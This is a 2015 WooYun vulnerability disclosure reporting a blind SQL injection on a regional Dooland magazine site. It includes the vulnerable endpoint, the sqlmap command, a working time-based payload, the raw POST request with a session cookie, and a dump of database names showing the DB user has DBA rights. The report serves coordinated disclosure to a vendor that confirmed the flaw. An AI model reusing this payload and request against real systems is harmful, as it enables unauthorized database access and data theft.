当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0110819

漏洞标题:读览天下sql注入漏洞

相关厂商:dooland.com

漏洞作者: heh3

提交时间:2015-04-28 14:17

修复时间:2015-06-14 11:24

公开时间:2015-06-14 11:24

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-28: 细节已通知厂商并且等待厂商处理中
2015-04-30: 厂商已经确认,细节仅向厂商公开
2015-05-10: 细节向核心白帽子及相关领域专家公开
2015-05-20: 细节向普通白帽子公开
2015-05-30: 细节向实习白帽子公开
2015-06-14: 细节向公众公开

简要描述:

读览天下河南分站存在sql注入漏洞,无意中检测到了一个注入,之前有人提交过其官方主站上就存在这个漏洞,详细见http://www.wooyun.org/bugs/wooyun-2010-052121,不知道其他站点有没有,反正henu.dooland.com是存在的,盲注。

详细说明:

读览天下河南分站存在sql注入漏洞,无意中检测到了一个注入,之前有人提交过其官方主站上就存在这个漏洞,详细见 WooYun: 读览天下主站sql注入 ,不知道其他站点有没有,反正henu.dooland.com是存在的,盲注。
注入点在这/site/magazine/ReadStat/stat_page_click.php
官方站上的厂商回应修补过了,分站就不管了?

漏洞证明:

post数据保存为sql.txt
sqlmap.py -r sql.txt -p id --dbs
Parameter: id (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: block=%E5%88%86%E7%B1%BB%E9%A1%B5&id=2' AND (SELECT * FROM (SELECT
SLEEP(5)))qABN) AND 'XOjN'='XOjN&type=mag
---
[11:44:45] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.33
back-end DBMS: MySQL 5.0.12
[11:44:45] [INFO] fetching database names
[11:44:45] [INFO] fetching number of databases
[11:44:45] [INFO] resumed: 69
[11:44:45] [INFO] resumed: infor\x04\\?84ation_schema
[11:44:45] [INFO] resumed: 96doc
[11:44:45] [INFO] resumed: AlightingService
[11:44:45] [INFO] resumed: OEM
[11:44:45] [INFO] resumed: SearchQon
[11:44:45] [INFO] resumed: amfans
[11:44:45] [INFO] resumed: android_single
[11:44:45] [INFO] resumed: autofan_client\x05
[11:44:45] [INFO] resumed: bugtraeker
[11:44:45] [INFO] resumed: bugtreckwr_mzntis
[11:44:45] [INFO] resumed: ihildren
[11:44:45] [INFO] resumed: comoon%
[11:44:45] [INFO] resumed: c\x05\r~p_nmws
[11:44:45] [INFO] resumed: dool|nuecliunt
[11:44:45] [INFO] resumed: dsps_Urpup
[11:44:45] [INFO] resumed: dzns_Photo\x0c\x11=\x08
[11:44:45] [INFO] resumed: esns_bqogE\x12
[11:44:45] [INFO] resumed: dsns_dartoynq
[11:44:45] [INFO] resumed: dsns_shzre#\x05
[11:44:45] [INFO] resumed: d\\?e1Nns_tmp
[11:44:45] [INFO] resumed: dsns_u}er
[11:44:45] [INFO] resumed: dudubmo
[11:44:45] [INFO] resumed: dwdubao_ad\\?dc
[11:44:45] [INFO] resumed: J0udubcu_bak
[11:44:45] [INFO] resumed: dudubao_boqk
[11:44:45] [INFO] resumed: dudubao`hd
[11:44:45] [INFO] resumed: dudubao`stat
[11:44:45] [INFO] resumed: eCatapogSjrvice
[11:44:45] [INFO] resumed: expand
[11:44:45] [INFO] resumed: flipdu
[11:44:45] [INFO] resumed: gtlisten
[11:44:45] [INFO] resumed: hk
[11:44:45] [INFO] resumed: hzaspt
[11:44:45] [INFO] resumed: inswapaper
[11:44:45] [INFO] resumed: ipad
[11:44:45] [INFO] resumed: ipad_souni_book
[11:44:45] [INFO] resumed: maglook
[11:44:45] [INFO] resumed: maglook_vcart
[11:44:45] [INFO] resumed: maika
[11:44:45] [INFO] resumed: mantis
[11:44:45] [INFO] resumed: mysql
[11:44:45] [INFO] resumed: news
[11:44:45] [INFO] resumed: newspaper
[11:44:45] [INFO] resumed: np
[11:44:45] [INFO] resumed: opds_aldiko
[11:44:45] [INFO] resumed: photo_tmp
[11:44:45] [INFO] resumed: poly
[11:44:45] [INFO] resumed: push
[11:44:45] [INFO] resumed: snsapp
[11:44:45] [INFO] resumed: spider
[11:44:45] [INFO] resumed: stat_dudubao
[11:44:45] [INFO] resumed: test
[11:44:45] [INFO] resumed: testdb
[11:44:45] [INFO] resumed: tinyconference
[11:44:45] [INFO] resumed: tob_client
[11:44:45] [INFO] resumed: tob_clienu_bak
[11:44:45] [INFO] resumed: tob_client_bak_20130201
[11:44:45] [INFO] resumed: tob_health
[11:44:45] [INFO] resumed: tob_health_admin
[11:44:45] [INFO] resumed: tob_health_bau
[11:44:45] [INFO] resumed: tob_health_debug
[11:44:45] [INFO] resumed: tob_health_hd
[11:44:45] [INFO] resumed: tob_health_static
[11:44:45] [INFO] resumed: uch
[11:44:45] [INFO] resumed: vilady
[11:44:45] [INFO] resumed: vip_statistics
[11:44:45] [INFO] resumed: wejbo
[11:44:45] [INFO] resumed: weibo_lianxiang
[11:44:45] [INFO] resumed: zazhishe
available databases [69]:
[*] `96doc`
[*] `autofan_client`
~p_nmws`
[*] `comoon%`
[*] `d\?e1Nns_tmp`
[*] `dool|nuecliunt`
[*] `dsns_shzre#`
[*] `dsns_u}er`
[*] `dudubao`hd`
[*] `dudubao`stat`
[*] `dwdubao_ad\?dc`
[*] `dzns_Photo`
[*] `esns_bqogE`
[*] `infor\?84ation_schema`
[*] AlightingService
[*] amfans
[*] android_single
[*] bugtraeker
[*] bugtreckwr_mzntis
[*] dsns_dartoynq
[*] dsps_Urpup
[*] dudubao_boqk
[*] dudubmo
[*] eCatapogSjrvice
[*] expand
[*] flipdu
[*] gtlisten
[*] hk
[*] hzaspt
[*] ihildren
[*] inswapaper
[*] ipad
[*] ipad_souni_book
[*] J0udubcu_bak
[*] maglook
[*] maglook_vcart
[*] maika
[*] mantis
[*] mysql
[*] news
[*] newspaper
[*] np
[*] OEM
[*] opds_aldiko
[*] photo_tmp
[*] poly
[*] push
[*] SearchQon
[*] snsapp
[*] spider
[*] stat_dudubao
[*] test
[*] testdb
[*] tinyconference
[*] tob_client
[*] tob_client_bak_20130201
[*] tob_clienu_bak
[*] tob_health
[*] tob_health_admin
[*] tob_health_bau
[*] tob_health_debug
[*] tob_health_hd
[*] tob_health_static
[*] uch
[*] vilady
[*] vip_statistics
[*] weibo_lianxiang
[*] wejbo
[*] zazhishe
[11:48:57] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.33
back-end DBMS: MySQL 5.0.12
[11:48:57] [INFO] testing if current user is DBA
[11:48:57] [INFO] fetching current user
[11:48:57] [INFO] resumed: dbadm@121.9.213.7
current user is DBA: True
3306开着了,不过好像限制了外部ip访问.
注入太慢了,只查了一些关键的密码,我就不贴了,因为之前有人贴过了,你们管理都不带改密码的么?

POST /site/magazine/ReadStat/stat_page_click.php HTTP/1.1
Content-Length: 180
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://henu.dooland.com:80/
Cookie: PHPSESSID=1ca909fo4klstvrk38cgp6i725; view_magid_all=84251%2C84328%2C84306%2C84303%2C84235%2C0%2C84302%2C84250%2C
Host: henu.dooland.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
block=%E5%88%86%E7%B1%BB%E9%A1%B5&id=2&type=mag


修复方案:

按照主站的修复方法再来一次就行了,只不过不知道你们主站上次修补了没?@xsser老大,你看我还是路人呢,送我一万rank行不行,一分钟都行,我只想截个图!

版权声明:转载请注明来源 heh3@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-04-30 11:23

厂商回复:

确认

最新状态:

暂无